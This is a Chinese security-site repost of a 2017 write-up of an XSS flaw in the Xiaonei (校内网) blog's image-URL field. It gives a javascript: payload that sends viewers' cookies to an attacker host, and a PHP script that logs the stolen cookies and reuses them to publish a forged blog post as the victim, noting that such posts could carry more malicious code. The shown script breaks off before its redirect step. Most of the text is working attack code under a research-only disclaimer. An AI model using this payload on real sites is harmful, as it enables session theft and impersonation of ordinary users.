校内网一个跨站漏洞的利用 's

admin 2017年4月29日20:10:27评论278 views字数 1148阅读3分49秒阅读模式
摘要

作者:Flyh4t校内网在发blog时对插入图片过滤不严格,存在xss漏洞在发blog时将插入图片URL写为如下代码即可触发:

作者:Flyh4t

校内网在发blog时对插入图片过滤不严格,存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发:

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie

test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:

<?php ob_start(); $url = 'blog.xiaonei.com'; $cookie=$_GET['cookie']; $cookie1=$cookie."/r/n/r/n"; fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt  //发一条伪造的日志,这条日志里面也可以插入恶意代码 $sock = fsockopen("$url", 80, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)/n"); $data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";  fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1/r/n"); fwrite($sock, "Accept: */*/r/n"); fwrite($sock, "Referer: http://$url/r/n"); fwrite($sock, "Accept-Language: zh-cn/r/n"); fwrite($sock, "Content-Type: application/x-www-form-urlencoded/r/n"); fwrite($sock, "Accept-Encoding: gzip, deflate/r/n"); fwrite($sock, "User-Agent: Mozilla/r/n"); fwrite($sock, "Host: $url/r/n"); fwrite($sock, "Content-Length: ".strlen($data)."/r/n"); fwrite($sock, "Connection: Keep-Alive/r/n"); fwrite($sock, "Cache-Control: no-cache/r/n"); fwrite($sock, "Cookie:".$cookie."/r/n/r/n"); fwrite($sock, $data);

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月29日20:10:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   校内网一个跨站漏洞的利用 'shttps://cn-sec.com/archives/44611.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息